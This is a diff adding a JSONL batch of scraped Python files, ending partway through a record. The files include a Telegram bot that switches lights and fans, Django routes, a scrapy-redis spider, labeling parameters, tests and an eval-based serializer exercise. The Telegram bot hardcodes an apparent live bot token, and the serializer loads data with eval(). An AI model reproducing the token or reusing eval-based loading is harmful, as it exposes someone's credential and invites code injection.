diff --git "a/3074.jsonl" "b/3074.jsonl" new file mode 100644--- /dev/null +++ "b/3074.jsonl" @@ -0,0 +1,660 @@ +{"seq_id":"311699496","text":"from Adafruit_IO import Client #importing adafruit library\nfrom telegram.ext import Updater,MessageHandler,Filters #importing telegram libraries\nimport os #import os to get hidden keys\nimport random\n#get feed key of adafruit feed\nfeed_key = os.getenv('feed_key') \n#creating a client\naio = Client('uvi', feed_key) \n\n\n#lists \ngreeting = [\"hi\",\"hello\",\"hey\"]\ntay = [\"what can you do?\",\"what will you do?\",\"say about yourself\"]\nhowlist = [\"how are you?\",\"how are you\"]\nfinelist = [\"fine\",\"great\",\"good\"]\nlight_on = [\"turn on the light\",\"turn on light\",\"lights on\",\"light on\",\"its dark here\",\"on the light\"]\nlight_off = [\"turn off the light\",\"turn off light\",\"lights off\",\"light off\"]\nfan_on = [\"turn on the fan\",\"turn on fan\",\"fan on\",\"on the fan\"]\nfan_off = [\"turn off the fan\",\"turn off fan\",\"fan off\",\"off the fan\"]\n\n#to make the light ON\ndef ledon(bot,update):\n chat_id = bot.message.chat_id\n animation_url = 'https://media.baamboozle.com/uploads/images/68811/1618179100_34871_gif-url.gif'\n bot.message.reply_text(\"Done,lights turned on!✌\")\n update.bot.sendAnimation(chat_id=chat_id,animation=animation_url,duration=2)\n aio.send('led', 1)\n\n#to make the light OFF\ndef ledoff(bot,update):\n chat_id = bot.message.chat_id\n path='https://labblog.uofmhealth.org/sites/lab/files/2018-11/michigan-med-l-ocd-study.gif'\n bot.message.reply_text(\"Done,lights turned off!👍\")\n update.bot.sendAnimation(chat_id=chat_id,animation=path)\n aio.send('led', 0)\n\n#make fan ON\ndef fanon(bot,update):\n chat_id = bot.message.chat_id\n path='https://mir-s3-cdn-cf.behance.net/project_modules/disp/bafb3929035897.55decb26f207b.gif'\n bot.message.reply_text(\"Done,fan turned on!✌\")\n update.bot.sendAnimation(chat_id=chat_id,animation=path)\n aio.send('fan', 1)\n\n#make fan OFF\ndef fanoff(bot,update):\n chat_id = bot.message.chat_id\n path='https://d1j8pt39hxlh3d.cloudfront.net/uploads/thumbs_up_sign_256_1.gif'\n bot.message.reply_text(\"Done,fan turned off!\")\n update.bot.sendAnimation(chat_id=chat_id,animation=path)\n aio.send('fan', 0)\n\n#to get the status of light\ndef lightOnorOff(bot,update):\n feedLight = aio.receive('led')\n if(feedLight.value=='1'):\n bot.message.reply_text(\"ON\")\n else:\n bot.message.reply_text(\"OFF\")\n print(feedLight.value)\n \n#get status of fan \ndef fanOnorOff(bot,update):\n feedFan = aio.receive('fan')\n if(feedFan.value=='1'):\n bot.message.reply_text(\"ON\")\n else:\n bot.message.reply_text(\"OFF\")\n print(feedFan.value)\n \n#for invalid commands \ndef inval(bot,update): \n bot.message.reply_text(\"Invalid command!\")\n\n#greeting \ndef greet(bot,update):\n bot.message.reply_text(\"👋Hi!.. You can give me commands to turn ON or OFF the light or fan and also to get status of light and fan.\")\n \n \n#about the bot \ndef about(bot,update):\n bot.message.reply_text(\"I can turn on and off the light and fan for you\")\n\ndef fine(bot,update):\n mes = random.choice(finelist)\n bot.message.reply_text(mes)\n\ndef ok(bot,update):\n bot.message.reply_text(\"Okay!\")\n\n \n\ndef main(bot,update):\n a = bot.message.text.lower()\n print(a)\n if a in light_on:\n ledon(bot,update)\n elif a in light_off:\n ledoff(bot,update)\n elif a in fan_on:\n fanon(bot,update)\n elif a in fan_off:\n fanoff(bot,update)\n elif a in greeting:\n greet(bot,update)\n elif a in tay:\n about(bot,update)\n elif a in howlist:\n fine(bot,update)\n elif a == \"ok\" or a==\"okay\":\n ok(bot,update)\n elif a == \"light status\":\n lightOnorOff(bot,update)\n elif a == \"fan status\":\n fanOnorOff(bot,update)\n else:\n inval(bot,update)\n\nBOT_TOKEN = '1890518768:AAEidn93bZoXoQOl6wJWawizl0iCZ4N3p2k'\nup = Updater(BOT_TOKEN,use_context=True)\ndp = up.dispatcher\ndp.add_handler(MessageHandler(Filters.text,main))\nup.start_polling()\nup.idle()\n","sub_path":"telebotpy.py","file_name":"telebotpy.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"384374991","text":"\n\nfrom xai.brain.wordbase.nouns._plait import _PLAIT\n\n#calss header\nclass _PLAITING(_PLAIT, ):\n\tdef __init__(self,): \n\t\t_PLAIT.__init__(self)\n\t\tself.name = \"PLAITING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"plait\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_plaiting.py","file_name":"_plaiting.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"524034453","text":"unsortedlist = open(\"unsortedlist.txt\", \"r\")\nunsortedlistarr = unsortedlist.readlines()\nunsortedlist.close()\nuserlistparsed = set(unsortedlistarr)\nuserlistdiscrimorder = sorted(userlistparsed, key=lambda x: int(x.rsplit('#',1)[1]))\nuserfile = open('userlist.txt', 'w+')\nfor user in userlistdiscrimorder:\n try:\n userfile.write(user)\n except:\n print(\"User write error!\")","sub_path":"sortunsortedlist.py","file_name":"sortunsortedlist.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"264469253","text":"from django.urls import path\nfrom .views import registroProducto,listarProducto,editarProducto,eliminarProducto\nfrom .views import registroCliente,listarClientes,editarCliente,eliminarCliente,Inicio\nfrom django.contrib.auth.decorators import login_required\n\nurlpatterns = [\n path('Inicio',Inicio.as_view(), name = 'index'),\n path('registro_producto/',(registroProducto), name = 'registro_producto'),\n path('listar_producto/',(listarProducto.as_view()), name = 'listar_producto'),\n path('editar_producto/',(editarProducto), name = 'editar_producto'),\n path('eliminar_producto/',(eliminarProducto), name = 'eliminar_producto'),\n path('registro_cliente/',(registroCliente), name = 'registro_cliente'),\n path('listar_cliente/',(listarClientes), name = 'listar_cliente'),\n path('editar_cliente/',(editarCliente), name = 'editar_cliente'),\n path('eliminar_cliente/',(eliminarCliente), name = 'eliminar_cliente')\n]\n","sub_path":"inventario/apps/producto/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"73378221","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 7 21:40:19 2019\n\n@author: Brodie\n\nA list of changable parameters for use with labeling. A description of each\nis before it.\n\"\"\"\n\n# =============================================================================\n\"\"\"\nAll these paths and folders should exist from the git, if not, please create\n them. Or, change them here.\n\"\"\"\nimages_path = './data_per/image/'\n# Images to do, it will cycle through these\ndone_im_pat = './data_per/im_done/'\n# After images have a npy file made, they will be moved here move them\n# back to images_path if you would like to redo them\nresult_path = './data_per/label/'\n# Where you want label image to go\ncompar_path = './data_per/comparison/'\n# Where you want to comparison plots\nmatlab_path = './data_per/matFile/'\n# Where you want to keep the matlab files\nreport_path = './data_per/report/'\n# Where you want the reports\nunsplit_pat = './data_per/im_to_do/unsplit/'\n# If the image is too big, it will be split up, where would you like to\n# save the original?\nden_lat_pat = './data_per/dense_later/'\n# If you choose to do the crf later where would you like the\n# npy files saved?\nimage_types = [images_path + '*.TIF', images_path + '*.tif',\n images_path + '*.tiff',\n images_path + '*.JPG', images_path + '*.jpg',\n images_path + '*.jpeg', images_path + '*.JPEG',\n images_path + '*.png', images_path + '*.PNG'\n ]\n# List of image types to look for\n\n# =============================================================================\n\"\"\"\nSet these for the drawing GUI\n\"\"\"\nmax_x_steps = 2\nmax_y_steps = 2\nref_im_scale = .9\n# scale down the whole image for viewing use 1 if your\n# image fits on your screen\n# TODO: I don't think this is being used properly\nlw = 5\n# Initial line width\nim_order = 'RGB'\n# Some tif images are in BGR others are RGB\n# -options are: 'BGR', 'RGB'\n\n# =============================================================================\n\"\"\"\nTo change how the results are output.\n\"\"\"\na_label = 'a) Input'\n# What to label the left image\nb_label = 'b) CRF prediction'\n# What to label the middle image, or right image if doing 2\nplot_c = False\n# Do you want to plot your markings?\nc_label = 'b) Labels'\n# What to label the right image\nfont_size = 6\n# Font size for results images\nalpha_percent = 0.4\n# How see through the results should be (0-1)\nclasses = {'Person': '#FF0000',\n 'BackGround': '#329ba7'}\n# Set classes and colors here\nauto_class = \"No\"\n# Do you have a class that will be ignored by the machine learning? Like,\n# Shadow, or BackGround? In some cases all pixels in a small frame are 0,\n# and it will automatically set those to the throw away class name. If you\n# do not have one, set this to \"No\"\n\n# =============================================================================\n\"\"\"\nThese parameters are for the CRF. You will likely not want to change these.\nThey work well with any images I have tried for this purpose. Although some\ncan be learned and a good project would be writing a machine learning node\nto learn what works best.\n\"\"\"\ntheta = 60\n# \"nearness\" tolerance\nn_iter = 100\n# \"intensity\" tolerance\ncompat_col = 40\nscale = 5\nprob = 0.5\ndo_dense_later = False\n# If you get into a groove and just want to label for a while, you\n# can save off the labels to do the dense CRF portion later\n\n# =============================================================================\n\"\"\"\nIf you are doing a gray-scale image, sometimes it is best\nto look at it with a different colormap. Other optins found at:\n https://matplotlib.org/tutorials/colors/colormaps.html\n\"\"\"\nc_map = 'gray'\n\n# =============================================================================\n\"\"\"\nThis just puts it all in one place. No need to edit this unless you add or\n subtract a whole parameter above.\n\"\"\"\nparams = {'images_path': images_path,\n 'done_im_pat': done_im_pat,\n 'result_path': result_path,\n 'compar_path': compar_path,\n 'matlab_path': matlab_path,\n 'report_path': report_path,\n 'unsplit_pat': unsplit_pat,\n 'den_lat_pat': den_lat_pat,\n 'image_types': image_types,\n 'max_x_steps': max_x_steps,\n 'max_y_steps': max_y_steps,\n 'ref_im_scale': ref_im_scale,\n 'lw': lw,\n 'im_order': im_order,\n 'a_label': a_label,\n 'b_label': b_label,\n 'plot_c': plot_c,\n 'c_label': c_label,\n 'font_size': font_size,\n 'alpha_percent': alpha_percent,\n 'classes': classes,\n 'auto_class': auto_class,\n 'theta': theta,\n 'n_iter': n_iter,\n 'compat_col': compat_col,\n 'scale': scale,\n 'prob': prob,\n 'do_dense_later': do_dense_later,\n 'c_map': c_map}\n","sub_path":"create_groundtruth/modules/params_per.py","file_name":"params_per.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"98303177","text":"\"\"\"Define the module to test `date_utils`.\"\"\"\nimport datetime\nimport pytest\n\nfrom scrapd.core import date_utils\n\n\n@pytest.mark.parametrize('current,from_,to,expected', [\n ('Jan 10', 'Jan 1', 'Jan 31', True),\n ('Jan 1', None, None, True),\n])\ndef test_is_in_range_00(current, from_, to, expected):\n \"\"\"Ensure a date is in range.\"\"\"\n assert date_utils.is_in_range(current, from_, to) == expected\n\n\n@pytest.mark.parametrize('date, default, settings, expected', [\n ('Jan 1 2019', None, None, datetime.datetime(2019, 1, 1, 0, 0)),\n ('Not a date', datetime.datetime.min, None, datetime.datetime(1, 1, 1, 0, 0)),\n])\ndef test_parse_date_00(date, default, settings, expected):\n \"\"\"Ensure a parsed date returns a value.\"\"\"\n assert date_utils.parse_date(date, default=default, settings=settings) == expected\n\n\ndef test_parse_date_01():\n \"\"\"Ensure an invalid date with no default raises an exception.\"\"\"\n with pytest.raises(Exception):\n date_utils.parse_date('Not a date')\n\n\n@pytest.mark.parametrize('date, expected', [\n ('Jan 10 2019', '01/10/2019'),\n ('2019-01-10', '01/10/2019'),\n])\ndef test_clean_date_string_00(date, expected):\n \"\"\"Ensure date string is properly formatted.\"\"\"\n assert date_utils.clean_date_string(date) == expected\n","sub_path":"tests/core/test_date_utils.py","file_name":"test_date_utils.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"225570504","text":"# -*- coding: utf-8 -*-\n\nimport re\n\nimport redis\nfrom scrapy_redis.spiders import RedisSpider\nfrom ..items.items import MyCrawlerItem\nfrom ..util import url_cleaning\nfrom ..settings import REDIS_URL,BOT_NAME\nfrom scrapy import Request\nfrom ..util.get_proxy import get_proxy\n\nimport sys,threading\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n\nclass test_spider(RedisSpider):\n\n name = \"mycrawler\"\n # download_delay = 2\n\n # start_urls = [r\"https://taobao.com\"]\n # custom_settings = #在爬虫运行时覆盖来自settings的设置\n\n # redis_key = 'mycrawler:start_urls' #redis中要有主键为mycrawler:start_urls的list,没有的话爬虫只能监听等待\n\n def __init__(self, name=None, **kwargs):\n if name is not None:\n self.name = name\n elif not getattr(self, 'name', None):\n raise ValueError(\"%s must have a name\" % type(self).__name__)\n self.__dict__.update(kwargs)\n if not hasattr(self, 'start_urls'):\n self.start_urls = []\n\n #开个线程,不断获取proxy\n self.get_proxy_threading = threading.Thread(target=get_proxy,args=())\n self.get_proxy_threading.setDaemon(True)\n self.get_proxy_threading.start()\n\n self.server = redis.StrictRedis.from_url(REDIS_URL)\n\n # if kwargs:\n # #DONE 初始start_urls加入爬取队列:\n # self.json = eval(kwargs[\"json\"])\n # self.start_server = redis.StrictRedis.from_url(REDIS_URL)\n # for task in self.json.keys():\n # self.start_server.lpush('%s:start_urls'%BOT_NAME,task)\n\n # def make_requests_from_url(self, url):\n # return get_message_from_json(url,self.json)\n\n def parse(self, response):\n\n # DONE 抽取该页新的url并清洗\n body = response.body\n pattern = re.compile(r'href=\\\".*?\\\"',re.M)\n urls = pattern.findall(body)\n urls = url_cleaning.all_url_cleaning(self.server,response,urls)\n # print 'haha'\n item = MyCrawlerItem()\n item['url'] = response.url\n item['id'] = response.meta[\"id\"]\n\n this_task_information = eval(self.server.hget('%s:task_information' % BOT_NAME, response.meta[\"id\"]))\n\n\n # DONE 新闻博客类抽取整页\n if this_task_information[\"type\"] == 0:\n item['type'] = 0\n item['content'] = body.decode(\"unicode_escape\")\n\n # DONE 电商类抽取部分结构化好的商品信息\n elif this_task_information[\"type\"] == 1 and response.meta.has_key('fetcheditemcontents'):\n item['type'] = 1\n item['content'] = response.meta[\"fetcheditemcontents\"]\n #未识别类型\n else:\n item['type'] = -1\n item['content'] = ''\n\n yield item\n\n\n #DONE 将符合条件的链接加到待爬取队列中去,传递meta\n for url in urls:\n if this_task_information[\"type\"] == 1:\n this_url_priority = this_task_information[\"priority\"]\n this_url_rule = ''\n\n # 识别特殊页面,设置优先级和\n if this_task_information.has_key(\"rules\") and this_task_information[\"rules\"]:\n for rule in this_task_information[\"rules\"].keys():\n if re.compile(rule).match(url):\n this_url_rule = rule\n # 详情页,优先级增加\n this_url_priority += 1\n\n # meta中共两项:id、this_url_rule\n clean_meta = {}\n clean_meta[\"id\"] = response.meta[\"id\"]\n clean_meta[\"this_url_rule\"] = this_url_rule\n yield Request(url, priority=this_url_priority, meta=clean_meta)\n else:\n # meta中共一项:id\n yield Request(url, priority=this_task_information[\"priority\"], meta=response.meta)","sub_path":"mycrawler/spiders/test_spider.py","file_name":"test_spider.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"125064079","text":"def fib(n, memo):\r\n if n in memo:\r\n return memo[n]\r\n if n == 0:\r\n return 0\r\n elif n == 1:\r\n return 1\r\n else:\r\n memo[n] = fib(n-1, memo) + fib(n-2, memo)\r\n return memo[n]\r\n\r\ndef main():\r\n for n in range(2, 35):\r\n memo = {} #store the value of fib in a dictionary to remember the value so then can access that value and not have to calculate it everytime\r\n print(n, fib(n, memo))\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"week5/fast_fib.py","file_name":"fast_fib.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"43622350","text":"class my_class():\n def __init__(self, s):\n self.c = s\n self.s = s+s\n class my_class2():\n se = 23\n a = 1\n b = \"mfksdkfs\"\n d = 'hhh'\n def pr(self):\n print('a = ', self.a, ' b = ', self.b, ' c = ', self.c)\n self.c = self.a\n self.a = self.s # a stanovitsa attributom\n print('a = ', self.a, ' b = ', self.b, ' c = ', self.c)\ndef foo():\n return None\n\nprint(my_class.my_class2)\nprint('name = '+str(my_class.__name__))\nprint(\"just class \")\nprint('name = '+str(foo.__qualname__))\nprint(\"just func \")\nprint(my_class.pr)\nasd = eval(str(my_class.pr.__qualname__))\nprint(asd)\nprint(eval('''foo'''))\n\n##\n# list serlzr & de_srlzr\n# add type and str in return dict\n\n# TODO ADD global local\n# TODO Git\ndef make_lines_from_collection(collection):\n dump_obj = make_corrent_dumps(\n make_correct_and_str_dict(collection),\n collection)\n return dump_obj\n\ndef make_correct_and_str_dict(obj):\n # correct_values = []\n # str_values = []\n correct_and_str = {'correct_values': [], 'str_values': []}\n if type(obj).__name__ == 'dict':\n keys = obj.keys()\n values = obj.values()\n for i in keys:\n print(str(i) + ' ' + type(i).__name__)\n\n if type(i).__name__ == 'type':\n print('+++++++++++++++++++++TYPE+++++++++++')\n\n correct_and_str['correct_values'].append(i.__qualname__)\n correct_and_str['str_values'].append(str(i))\n\n elif type(i).__name__ == 'function':\n print('+++++++++++++++++++++function+++++++++++')\n correct_and_str['correct_values'].append(i.__qualname__)\n correct_and_str['str_values'].append(str(i))\n if (type(i).__name__ == 'tuple'\n or type(i).__name__ == 'list'\n or type(i).__name__ == 'dict'\n or type(i).__name__ == 'set'):\n print('__________1111_________-to_str_objInObj(__________')\n tmp = make_correct_and_str_dict(i)\n correct_and_str['correct_values'] += tmp['correct_values']\n correct_and_str['str_values'] += tmp['str_values']\n\n\n for i in values:\n print(type(i).__name__)\n\n if type(i).__name__ == 'type':\n print('+++++++++++++++++++++TYPE+++++++++++')\n correct_and_str['correct_values'].append(i.__qualname__)\n correct_and_str['str_values'].append(str(i))\n\n if type(i).__name__ == 'function':\n print('+++++++++++++++++++++function+++++++++++')\n correct_and_str['correct_values'].append(i.__qualname__)\n correct_and_str['str_values'].append(str(i))\n\n if (type(i).__name__ == 'tuple'\n or type(i).__name__ == 'list'\n or type(i).__name__ == 'dict'\n or type(i).__name__ == 'set'):\n print('___________________-222to_str_objInObj(__________')\n tmp = make_correct_and_str_dict(i)\n correct_and_str['correct_values'] += tmp['correct_values']\n correct_and_str['str_values'] += tmp['str_values']\n\n\n\n else:\n for i in obj:\n print( type(i).__name__)\n\n if type(i).__name__ == 'type':\n print('+++++++++++++++++++++TYPE+++++++++++')\n correct_and_str['correct_values'].append(i.__qualname__)\n correct_and_str['str_values'].append(str(i))\n\n if type(i).__name__ == 'function':\n print('+++++++++++++++++++++function+++++++++++')\n correct_and_str['correct_values'].append(i.__qualname__)\n correct_and_str['str_values'].append(str(i))\n if (type(i).__name__ == 'tuple'\n or type(i).__name__ == 'list'\n or type(i).__name__ == 'dict'\n or type(i).__name__ == 'set'):\n print('___________________-to_str_objInObj(__________')\n tmp = make_correct_and_str_dict(i)\n correct_and_str['correct_values'] += tmp['correct_values']\n correct_and_str['str_values'] += tmp['str_values']\n return correct_and_str\n\ndef make_corrent_dumps(corrent_and_str, obj):\n str_values = corrent_and_str['str_values']\n correct_values = corrent_and_str['correct_values']\n lines = str(obj)\n\n print('str_ vall' + str(str_values))\n for i in range(len(str_values)):\n splt = lines.split(str_values[i], 1)\n if len(splt) > 1:\n lines = splt[0] + correct_values[i] + splt[1]\n print(type(lines))\n print(lines+'\\n\\n\\n')\n return {'type': type(obj).__name__, 'lines': lines}\n\ndef dumps_listt(value):\n dump_obj = {'type': type(value).__name__, 'lines': str(value)}\n\n if (dump_obj['type'] == 'tuple'\n or dump_obj['type'] == 'list'\n or dump_obj['type'] == 'dict'\n or dump_obj['type'] == 'set'):\n dump_obj = make_lines_from_collection(value)\n\n return dump_obj\n\ndef loads_listt(dump_obj):\n # if dump_obj['type'] == 'tuple' \\\n # or dump_obj['type'] == 'list' \\\n # or dump_obj['type'] == 'dict':\n # obj\n print(dump_obj)\n if dump_obj['type'] == 'str':\n return str(eval(dump_obj['lines']))\n else:\n return eval(dump_obj['lines'])\n\n\n\n\n##\na = ['9999', \"5555\", 123, {'o': 'ok', 's': 1233}]\n\nev = loads_listt(dumps_listt(a))\n\nfor i in range(len(ev)):\n print(type(a[i]).__name__ + ' . ' + type(ev[i]).__name__ + ' = ' + str(ev[i]))\n\nq = ev[3]\nq = loads_listt(dumps_listt(q))\nprint(type(q).__name__+str(q))\nprint(type(q['o']).__name__ + str(q['o']))\nprint(type(q['s']).__name__ + str(q['s']))\nprint('all is ok\\n')\n\n##\n\nsett = {1, 2, 3, 1, 2, 4}\na = 1\naa = 1.1\ns = '2'\nd = {'3': 3, '4': {'1': [1, 2, 3]}, foo: my_class}\nf = [my_class, 'www', [12, 34]]\ng = ('asdasd', my_class, 33.3, {1, 2, 3, 1, 2, 4, my_class})\n\nfff = loads_listt(dumps_listt(a))\nprint(type(fff).__name__ + ' ' + str(fff))\n\nfff = loads_listt(dumps_listt(aa))\nprint(type(fff).__name__ + ' ' + str(fff))\n\nfff = loads_listt(dumps_listt(s))\nprint(type(fff).__name__ + ' ' + str(fff))\n\nfff = loads_listt(dumps_listt(g))\nprint(type(fff).__name__ + ' ' + str(fff))\n\nfff = loads_listt(dumps_listt(f))\nprint(type(fff).__name__ + ' ' + str(fff))\n\nfff = loads_listt(dumps_listt(d))\nprint(type(fff).__name__ + ' ' + str(fff))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n##\n\ndef dumps_int(obj):\n return str(obj)\ndef dumps_float(obj):\n return str(obj)\ndef dumps_list(obj):\n d = {}\n for l in obj:\n type_l = type(l).__name__\n if type_l != 'str':\n l = funk[type_l](l)\n d.update(type_l)\n # str = '{'\n # for l in obj:\n # str = str + 'type: ' + type(l).__name__\n # if type(l).__name__!= 'str':\n # l = funk[type(l).__name__](l)\n # str = str + l + ', '\n # str = str[:-2] + '}'\n return str\n\n\n\ndef dumps_dict(obj):\n keys = []\n for key in obj:\n if type(key).__name__ == 'int':\n key = dumps_int(key)\n keys.append({'type': type(key).__name__, 'key': key})\n print(keys)\n values = []\n for key in keys:\n values.append(obj[key])\n print(values)\n\n\nfunk = {'int': dumps_int, 'float': dumps_float, 'list': dumps_list}\n\nprint(dumps_list(f))\n\n# dumps_dict(d)\n#\n# def dumps_a(obj):\n# print(type(obj))\n#\n# tp = type(obj).__name__\n# # s = str['str']\n# if tp == 'int':\n# s = str(obj)\n# elif tp == 'float':\n# s = str(obj)\n# elif tp == 'str':\n# s = obj\n# elif tp == 'dict':\n# dump_dict(obj)\n#\n# return 'DOpis dict'\n# elif tp == 'list':\n#\n# elif tp == 'tuple':\n# elif tp == 'byte':\n# elif tp == 'NoneType':\n#\n#\n# dump = {'type':type(obj).__name__,'str':str(obj)}\n# print(dump)\n# return dump\n#\n# def loads_a(str):\n# print(str)\n# tp = str['type']\n# s = str['str']\n# if tp == 'int':\n# return int(s)\n# elif tp == 'float':\n# return float(s)\n# elif tp == 'str':\n# return s\n# elif tp == 'dict':\n# return 'DOpis dict'\n# elif tp == 'list':\n#\n# elif tp == 'tuple':\n# elif tp == 'byte':\n# elif tp == 'NoneType':","sub_path":"test/left.py","file_name":"left.py","file_ext":"py","file_size_in_byte":8193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"189458980","text":"from torch import nn\nfrom layers import *\n\nimport torch\nimport math\nimport numpy as np\nimport random\n\n\nclass ReCoSaTransformer(nn.Module):\n def __init__(self, config, embedding=None):\n super().__init__()\n \n # Seed fixing\n np.random.seed(777)\n torch.manual_seed(777)\n torch.cuda.manual_seed_all(777)\n random.seed(777)\n \n self.config = config\n self.use_gpt = False\n if embedding is not None:\n self.use_gpt = True\n \n # Embedding components\n if self.use_gpt:\n self.embedding = embedding # GPT2 word embedding layer\n self.embedding_linear = nn.Linear(self.embedding.embedding_dim, self.config['d_model'])\n else:\n self.embedding = nn.Embedding(self.config['vocab_size'], self.config['d_model'])\n self.word_pembedding = PositionalEncoder(self.config['max_len'], self.config['d_model'], self.config['device'])\n self.time_pembedding = PositionalEncoder(self.config['max_time'], self.config['d_model'], self.config['device'])\n \n # Word Level LSTM components\n self.word_level_rnn = nn.GRU(\n input_size=self.config['d_model'],\n hidden_size=self.config['hidden_size'],\n num_layers=self.config['gru_num_layers'],\n dropout=(0.0 if self.config['gru_num_layers'] == 1 else self.config['gru_dropout']),\n batch_first=True,\n )\n \n # Encoder & Decoder\n self.encoder = Encoder(\n self.config['hidden_size'] + self.config['d_model'], \n self.config['d_ff'], \n self.config['num_heads'], \n self.config['dropout'], \n self.config['encoder_num_layers']\n )\n self.decoder = Decoder(\n self.config['hidden_size'] + self.config['d_model'], \n self.config['d_ff'], \n self.config['num_heads'], \n self.config['dropout'], \n self.config['decoder_num_layers']\n )\n \n self.output_linear = nn.Linear(self.config['hidden_size'] + self.config['d_model'], self.config['vocab_size'])\n self.softmax = nn.LogSoftmax(dim=-1)\n \n \n def init_model(self): \n # Initialize parameters\n for param in self.parameters():\n if param.dim() > 1:\n nn.init.xavier_uniform_(param)\n \n def forward(self, src_input, trg_input, e_mask, d_mask):\n # Embeddings & Masking\n src_emb = self.src_embed(src_input) # (B, T, 2*d_model)\n trg_emb = self.trg_embed(trg_input) # (B, L, 2*d_model)\n \n # Encoding phase\n e_output = self.encoder(src_emb, e_mask) # (B, T, 2*d_model)\n \n # Decoding phase\n d_output = self.decoder(trg_emb, e_output, e_mask, d_mask) # (B, L, 2*d_model)\n \n output = self.softmax(self.output_linear(d_output)) # (B, L, vocab_size)\n \n return output # (B, L, vocab_size)\n \n def src_embed(self, src_input):\n src_emb = self.embedding(src_input) # (B, T, L, d_model)\n if self.use_gpt:\n src_emb = self.embedding_linear(src_emb) # (B, T, L, d_model)\n max_len, d_model = src_emb.shape[2], src_emb.shape[3]\n last_hiddens = self.word_level_rnn(src_emb.view(-1, max_len, d_model))[1][-1] # (B*T, d_model)\n \n batch_size = src_emb.shape[0]\n src_emb = last_hiddens.view(batch_size, -1, d_model) # (B, T, d_model)\n src_emb = self.time_pembedding(src_emb, cal='concat') # (B, T, 2*d_model)\n \n return src_emb # (B, T, 2*d_model)\n \n def trg_embed(self, trg_input):\n trg_emb = self.embedding(trg_input) # (B, L, d_model)\n if self.use_gpt:\n trg_emb = self.embedding_linear(trg_emb) # (B, L, d_model)\n trg_emb = self.word_pembedding(trg_emb, cal='concat') # (B, L, 2*d_model)\n \n return trg_emb # (B, L, 2*d_model)\n\n \nclass Encoder(nn.Module):\n def __init__(self, d_model, d_ff, num_heads, dropout, num_layers):\n super().__init__()\n self.d_model = d_model\n self.d_ff = d_ff\n self.num_heads = num_heads\n self.dropout = dropout\n self.num_layers = num_layers\n \n self.layers = nn.ModuleList([EncoderLayer(self.d_model, self.d_ff, self.num_heads, self.dropout) for i in range(self.num_layers)])\n self.layer_norm = LayerNormalization(self.d_model)\n\n def forward(self, x, e_mask):\n for i in range(self.num_layers):\n x = self.layers[i](x, e_mask)\n\n return self.layer_norm(x)\n\n\nclass Decoder(nn.Module):\n def __init__(self, d_model, d_ff, num_heads, dropout, num_layers):\n super().__init__()\n self.d_model = d_model\n self.d_ff = d_ff\n self.num_heads = num_heads\n self.dropout = dropout\n self.num_layers = num_layers\n \n self.layers = nn.ModuleList([DecoderLayer(self.d_model, self.d_ff, self.num_heads, self.dropout) for i in range(self.num_layers)])\n self.layer_norm = LayerNormalization(self.d_model)\n\n def forward(self, x, e_output, e_mask, d_mask):\n for i in range(self.num_layers):\n x = self.layers[i](x, e_output, e_mask, d_mask)\n\n return self.layer_norm(x) \n","sub_path":"src/recosa_transformer.py","file_name":"recosa_transformer.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"98178352","text":"from optparse import make_option\n\nfrom django.core.management.base import BaseCommand\nfrom django.db.models import Q\n\nfrom ...models import Activity, Workflow\nfrom ...proxy.swf import get_activities, get_workflows\n\n\nclass Command(BaseCommand):\n\n option_list = BaseCommand.option_list + (\n make_option(\n '--aws-access-key',\n dest='aws_access_key'\n ),\n make_option(\n '--aws-secret-key',\n dest='aws_secret_key'\n ),\n make_option(\n '--swf-domain',\n dest='swf_domain'\n )\n )\n\n def handle(self, args, options):\n activities = get_activities((options['aws_access_key'],\n options['aws_secret_key']),\n options['swf_domain'])\n _sync_tasks(Activity, activities)\n workflows = get_workflows((options['aws_access_key'],\n options['aws_secret_key']),\n options['swf_domain'])\n _sync_tasks(Workflow, workflows)\n\n\ndef _sync_tasks(TaskClass, remote_tasks):\n remote_tasks = set(remote_tasks)\n local_tasks = set(TaskClass.objects.all())\n tasks_to_delete = local_tasks - remote_tasks\n TaskClass.objects.filter(pk__in=[e.pk for e in tasks_to_delete]).delete()\n tasks_to_add = remote_tasks - local_tasks\n TaskClass.objects.bulk_create(tasks_to_add)\n","sub_path":"djdew/management/commands/sync_task_types.py","file_name":"sync_task_types.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"264854764","text":"# \n# this is testing purpose for webdriver\n#\n# Ref: \n# http://selenium-python.readthedocs.io/getting-started.html\n# \n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.common.keys import Keys\nfrom optparse import OptionParser\n\n# option in command line\nchromedriver = \"../chromedriver\"\nparser = OptionParser()\nparser.add_option(\"-d\", \"--driver\", action=\"store\", dest=\"drivername\")\n(options, args) = parser.parse_args()\nif options.drivername == 